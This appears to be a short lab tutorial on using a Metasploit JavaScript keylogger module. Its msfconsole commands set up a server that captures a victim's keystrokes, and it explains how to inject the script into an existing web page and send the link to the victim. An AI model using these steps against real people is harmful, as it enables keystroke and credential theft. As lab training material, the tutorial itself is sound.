This module runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. Future improvements will allow for a configurable template to be used with this module. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to "test", the following URL will load this script into the calling site: http://server:port/test/anything.js
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now search keylogger. Now you should be able to see the module.
Now type use auxiliary/server/capture/http_javascript_keylogger
Msf exploit (http_javascript_keylogger)>set demo true
Msf exploit (http_javascript_keylogger)>set lhost (IP of Local Host)
Msf exploit (http_javascript_keylogger)>set srvhost (This must be an address on the local machine)
Msf exploit (http_javascript_keylogger)>set uripath keylogger (The Url to use for this exploit)
Msf exploit (http_javascript_keylogger)>exploit
Send the URL to the victim and add demo at the end of the URL